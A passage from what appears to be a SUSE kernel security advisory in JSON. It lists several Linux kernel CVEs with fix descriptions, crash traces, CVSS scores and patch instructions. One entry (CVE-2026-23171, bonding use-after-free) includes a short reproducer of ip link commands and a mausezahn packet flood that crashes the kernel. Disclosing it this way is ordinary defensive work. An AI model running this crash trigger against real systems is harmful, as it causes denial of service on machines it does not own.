ffffffff8dde3a8b RDI: ffffffff8ff24ca0\nRBP: 0000000000000003 R08: ffffffff8fef35a3 R09: 1ffffffff1fde6b4\nR10: dffffc0000000000 R11: fffffbfff1fde6b5 R12: 00000000000012a2\nR13: ffff888030338ba8 R14: ffff888030338000 R15: ffff888030338b30\nFS: 00007fa5995f66c0(0000) GS:ffff8881256f8000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f7e72f842d0 CR3: 00000000485a0000 CR4: 00000000003526f0\nCall Trace:\n \u003cTASK\u003e\n lock_acquire+0x106/0x330 kernel/locking/lockdep.c:5868\n touch_wq_lockdep_map+0xcb/0x180 kernel/workqueue.c:3940\n __flush_workqueue+0x14b/0x14f0 kernel/workqueue.c:3982\n nci_close_device+0x302/0x630 net/nfc/nci/core.c:567\n nci_dev_down+0x3b/0x50 net/nfc/nci/core.c:639\n nfc_dev_down+0x152/0x290 net/nfc/core.c:161\n nfc_rfkill_set_block+0x2d/0x100 net/nfc/core.c:179\n rfkill_set_block+0x1d2/0x440 net/rfkill/core.c:346\n rfkill_fop_write+0x461/0x5a0 net/rfkill/core.c:1301\n vfs_write+0x29a/0xb90 fs/read_write.c:684\n ksys_write+0x150/0x270 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7fa59b39acb9\nCode: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007fa5995f6028 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007fa59b615fa0 RCX: 00007fa59b39acb9\nRDX: 0000000000000008 RSI: 0000200000000080 RDI: 0000000000000007\nRBP: 00007fa59b408bf7 R08: \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23167",
"url": "https://www.suse.com/security/cve/CVE-2026-23167"
},
{
"category": "external",
"summary": "SUSE Bug 1258374 for CVE-2026-23167",
"url": "https://bugzilla.suse.com/1258374"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23167"
},
{
"cve": "CVE-2026-23170",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23170"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/imx/tve: fix probe device leak\n\nMake sure to drop the reference taken to the DDC device during probe on\nprobe failure (e.g. probe deferral) and on driver unbind.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23170",
"url": "https://www.suse.com/security/cve/CVE-2026-23170"
},
{
"category": "external",
"summary": "SUSE Bug 1258379 for CVE-2026-23170",
"url": "https://bugzilla.suse.com/1258379"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23170"
},
{
"cve": "CVE-2026-23171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23171"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: fix use-after-free due to enslave fail after slave array update\n\nFix a use-after-free which happens due to enslave failure after the new\nslave has been added to the array. Since the new slave can be used for Tx\nimmediately, we can use it after it has been freed by the enslave error\ncleanup path which frees the allocated slave memory. Slave update array is\nsupposed to be called last when further enslave failures are not expected.\nMove it after xdp setup to avoid any problems.\n\nIt is very easy to reproduce the problem with a simple xdp_pass prog:\n ip l add bond1 type bond mode balance-xor\n ip l set bond1 up\n ip l set dev bond1 xdp object xdp_pass.o sec xdp_pass\n ip l add dumdum type dummy\n\nThen run in parallel:\n while :; do ip l set dumdum master bond1 1\u003e/dev/null 2\u003e\u00261; done;\n mausezahn bond1 -a own -b rand -A rand -B 1.1.1.1 -c 0 -t tcp \"dp=1-1023, flags=syn\"\n\nThe crash happens almost immediately:\n [ 605.602850] Oops: general protection fault, probably for non-canonical address 0xe0e6fc2460000137: 0000 [#1] SMP KASAN NOPTI\n [ 605.602916] KASAN: maybe wild-memory-access in range [0x07380123000009b8-0x07380123000009bf]\n [ 605.602946] CPU: 0 UID: 0 PID: 2445 Comm: mausezahn Kdump: loaded Tainted: G B 6.19.0-rc6+ #21 PREEMPT(voluntary)\n [ 605.602979] Tainted: [B]=BAD_PAGE\n [ 605.602998] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n [ 605.603032] RIP: 0010:netdev_core_pick_tx+0xcd/0x210\n [ 605.603063] Code: 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 3e 01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 8b 6b 08 49 8d 7d 30 48 89 fa 48 c1 ea 03 \u003c80\u003e 3c 02 00 0f 85 25 01 00 00 49 8b 45 30 4c 89 e2 48 89 ee 48 89\n [ 605.603111] RSP: 0018:ffff88817b9af348 EFLAGS: 00010213\n [ 605.603145] RAX: dffffc0000000000 RBX: ffff88817d28b420 RCX: 0000000000000000\n [ 605.603172] RDX: 00e7002460000137 RSI: 0000000000000008 RDI: 07380123000009be\n [ 605.603199] RBP: ffff88817b541a00 R08: 0000000000000001 R09: fffffbfff3ed8c0c\n [ 605.603226] R10: ffffffff9f6c6067 R11: 0000000000000001 R12: 0000000000000000\n [ 605.603253] R13: 073801230000098e R14: ffff88817d28b448 R15: ffff88817b541a84\n [ 605.603286] FS: 00007f6570ef67c0(0000) GS:ffff888221dfa000(0000) knlGS:0000000000000000\n [ 605.603319] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [ 605.603343] CR2: 00007f65712fae40 CR3: 000000011371b000 CR4: 0000000000350ef0\n [ 605.603373] Call Trace:\n [ 605.603392] \u003cTASK\u003e\n [ 605.603410] __dev_queue_xmit+0x448/0x32a0\n [ 605.603434] ? __pfx_vprintk_emit+0x10/0x10\n [ 605.603461] ? __pfx_vprintk_emit+0x10/0x10\n [ 605.603484] ? __pfx___dev_queue_xmit+0x10/0x10\n [ 605.603507] ? bond_start_xmit+0xbfb/0xc20 [bonding]\n [ 605.603546] ? _printk+0xcb/0x100\n [ 605.603566] ? __pfx__printk+0x10/0x10\n [ 605.603589] ? bond_start_xmit+0xbfb/0xc20 [bonding]\n [ 605.603627] ? add_taint+0x5e/0x70\n [ 605.603648] ? add_taint+0x2a/0x70\n [ 605.603670] ? end_report.cold+0x51/0x75\n [ 605.603693] ? bond_start_xmit+0xbfb/0xc20 [bonding]\n [ 605.603731] bond_start_xmit+0x623/0xc20 [bonding]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23171",
"url": "https://www.suse.com/security/cve/CVE-2026-23171"
},
{
"category": "external",
"summary": "SUSE Bug 1258349 for CVE-2026-23171",
"url": "https://bugzilla.suse.com/1258349"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23171"
},
{
"cve": "CVE-2026-23172",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23172"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: wwan: t7xx: fix potential skb-\u003efrags overflow in RX path\n\nWhen receiving data in the DPMAIF RX path,\nthe t7xx_dpmaif_set_frag_to_skb() function adds\npage fragments to an skb without checking if the number of\nfragments has exceeded MAX_SKB_FRAGS. This could lead to a buffer overflow\nin skb_shinfo(skb)-\u003efrags[] array, corrupting adjacent memory and\npotentially causing kernel crashes or other undefined behavior.\n\nThis issue was identified through static code analysis by comparing with a\nsimilar vulnerability fixed in the mt76 driver commit b102f0c522cf (\"mt76:\nfix array overflow on receiving too many fragments for a packet\").\n\nThe vulnerability could be triggered if the modem firmware sends packets\nwith excessive fragments. While under normal protocol conditions (MTU 3080\nbytes, BAT buffer 3584 bytes),\na single packet should not require additional\nfragments, the kernel should not blindly trust firmware behavior.\nMalicious, buggy, or compromised firmware could potentially craft packets\nwith more fragments than the kernel expects.\n\nFix this by adding a bounds check before calling skb_add_rx_frag() to\nensure nr_frags does not exceed MAX_SKB_FRAGS.\n\nThe check must be performed before unmapping to avoid a page leak\nand double DMA unmap during device teardown.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23172",
"url": "https://www.suse.com/security/cve/CVE-2026-23172"
},
{
"category": "external",
"summary": "SUSE Bug 1258519 for CVE-2026-23172",
"url": "https://bugzilla.suse.com/1258519"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23172"
},
{
"cve": "CVE-2026-23173",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23173"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: TC, delete flows only for existing peers\n\nWhen deleting TC steering flows, iterate only over actual devcom\npeers instead of assuming all possible ports exist. This avoids\ntouching non-existent peers and ensures cleanup is limited to\ndevices the driver is currently connected to.\n\n BUG: kernel NULL pointer dereference, address: 0000000000000008\n #PF: supervisor write access in kernel mode\n #PF: error_code(0x0002) - not-present page\n PGD 133c8a067 P4D 0\n Oops: Oops: 0002 [#1] SMP\n CPU: 19 UID: 0 PID: 2169 Comm: tc Not tainted 6.18.0+ #156 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:mlx5e_tc_del_fdb_peers_flow+0xbe/0x200 [mlx5_core]\n Code: 00 00 a8 08 74 a8 49 8b 46 18 f6 c4 02 74 9f 4c 8d bf a0 12 00 00 4c 89 ff e8 0e e7 96 e1 49 8b 44 24 08 49 8b 0c 24 4c 89 ff \u003c48\u003e 89 41 08 48 89 08 49 89 2c 24 49 89 5c 24 08 e8 7d ce 96 e1 49\n RSP: 0018:ff11000143867528 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: dead000000000122 RCX: 0000000000000000\n RDX: ff11000143691580 RSI: ff110001026e5000 RDI: ff11000106f3d2a0\n RBP: dead000000000100 R08: 00000000000003fd R09: 0000000000000002\n R10: ff11000101c75690 R11: ff1100085faea178 R12: ff11000115f0ae78\n R13: 0000000000000000 R14: ff11000115f0a800 R15: ff11000106f3d2a0\n FS: 00007f35236bf740(0000) GS:ff110008dc809000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000008 CR3: 0000000157a01001 CR4: 0000000000373eb0\n Call Trace:\n \u003cTASK\u003e\n mlx5e_tc_del_flow+0x46/0x270 [mlx5_core]\n mlx5e_flow_put+0x25/0x50 [mlx5_core]\n mlx5e_delete_flower+0x2a6/0x3e0 [mlx5_core]\n tc_setup_cb_reoffload+0x20/0x80\n fl_reoffload+0x26f/0x2f0 [cls_flower]\n ? mlx5e_tc_reoffload_flows_work+0xc0/0xc0 [mlx5_core]\n ? mlx5e_tc_reoffload_flows_work+0xc0/0xc0 [mlx5_core]\n tcf_block_playback_offloads+0x9e/0x1c0\n tcf_block_unbind+0x7b/0xd0\n tcf_block_setup+0x186/0x1d0\n tcf_block_offload_cmd.isra.0+0xef/0x130\n tcf_block_offload_unbind+0x43/0x70\n __tcf_block_put+0x85/0x160\n ingress_destroy+0x32/0x110 [sch_ingress]\n __qdisc_destroy+0x44/0x100\n qdisc_graft+0x22b/0x610\n tc_get_qdisc+0x183/0x4d0\n rtnetlink_rcv_msg+0x2d7/0x3d0\n ? rtnl_calcit.isra.0+0x100/0x100\n netlink_rcv_skb+0x53/0x100\n netlink_unicast+0x249/0x320\n ? __alloc_skb+0x102/0x1f0\n netlink_sendmsg+0x1e3/0x420\n __sock_sendmsg+0x38/0x60\n ____sys_sendmsg+0x1ef/0x230\n ? copy_msghdr_from_user+0x6c/0xa0\n ___sys_sendmsg+0x7f/0xc0\n ? ___sys_recvmsg+0x8a/0xc0\n ? __sys_sendto+0x119/0x180\n __sys_sendmsg+0x61/0xb0\n do_syscall_64+0x55/0x640\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n RIP: 0033:0x7f35238bb764\n Code: 15 b9 86 0c 00 f7 d8 64 89 02 b8 ff ff ff ff eb bf 0f 1f 44 00 00 f3 0f 1e fa 80 3d e5 08 0d 00 00 74 13 b8 2e 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 4c c3 0f 1f 00 55 48 89 e5 48 83 ec 20 89 55\n RSP: 002b:00007ffed4c35638 EFLAGS: 00000202 ORIG_RAX: 000000000000002e\n RAX: ffffffffffffffda RBX: 000055a2efcc75e0 RCX: 00007f35238bb764\n RDX: 0000000000000000 RSI: 00007ffed4c356a0 RDI: 0000000000000003\n RBP: 00007ffed4c35710 R08: 0000000000000010 R09: 00007f3523984b20\n R10: 0000000000000004 R11: 0000000000000202 R12: 00007ffed4c35790\n R13: 000000006947df8f R14: 000055a2efcc75e0 R15: 00007ffed4c35780",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23173",
"url": "https://www.suse.com/security/cve/CVE-2026-23173"
},
{
"category": "external",
"summary": "SUSE Bug 1258520 for CVE-2026-23173",
"url": "https://bugzilla.suse.com/1258520"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23173"
},
{
"cve": "CVE-2026-23176",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23176"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: toshiba_haps: Fix memory leaks in add/remove routines\n\ntoshiba_haps_add() leaks the haps object allocated by it if it returns\nan error after allocating that object successfully.\n\ntoshiba_haps_remove() does not free the object pointed to by\ntoshiba_haps before clearing that pointer, so it becomes unreachable\nallocated memory.\n\nAddress these memory leaks by using devm_kzalloc() for allocating\nthe memory in question.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23176",
"url": "https://www.suse.com/security/cve/CVE-2026-23176"
},
{
"category": "external",
"summary": "SUSE Bug 1258256 for CVE-2026-23176",
"url": "https://bugzilla.suse.com/1258256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23176"
},
{
"cve": "CVE-2026-23178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: i2c-hid: fix potential buffer overflow in i2c_hid_get_report()\n\n`i2c_hid_xfer` is used to read `recv_len + sizeof(__le16)` bytes of data\ninto `ihid-\u003erawbuf`.\n\nThe former can come from the userspace in the hidraw driver and is only\nbounded by HID_MAX_BUFFER_SIZE(16384) by default (unless we also set\n`max_buffer_size` field of `struct hid_ll_driver` which we do not).\n\nThe latter has size determined at runtime by the maximum size of\ndifferent report types you could receive on any particular device and\ncan be a much smaller value.\n\nFix this by truncating `recv_len` to `ihid-\u003ebufsize - sizeof(__le16)`.\n\nThe impact is low since access to hidraw devices requires root.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23178",
"url": "https://www.suse.com/security/cve/CVE-2026-23178"
},
{
"category": "external",
"summary": "SUSE Bug 1258358 for CVE-2026-23178",
"url": "https://bugzilla.suse.com/1258358"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23178"
},
{
"cve": "CVE-2026-23179",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23179"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready()\n\nWhen the socket is closed while in TCP_LISTEN a callback is run to\nflush all outstanding packets, which in turns calls\nnvmet_tcp_listen_data_ready() with the sk_callback_lock held.\nSo we need to check if we are in TCP_LISTEN before attempting\nto get the sk_callback_lock() to avoid a deadlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23179",
"url": "https://www.suse.com/security/cve/CVE-2026-23179"
},
{
"category": "external",
"summary": "SUSE Bug 1258394 for CVE-2026-23179",
"url": "https://bugzilla.suse.com/1258394"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23179"
},
{
"cve": "CVE-2026-23182",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23182"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: tegra: Fix a memory leak in tegra_slink_probe()\n\nIn tegra_slink_probe(), when platform_get_irq() fails, it directly\nreturns from the function with an error code, which causes a memory leak.\n\nReplace it with a goto label to ensure proper cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23182",
"url": "https://www.suse.com/security/cve/CVE-2026-23182"
},
{
"category": "external",
"summary": "SUSE Bug 1258259 for CVE-2026-23182",
"url": "https://bugzilla.suse.com/1258259"
}
],
"remediations": [
{
"category": "vendor_fix",
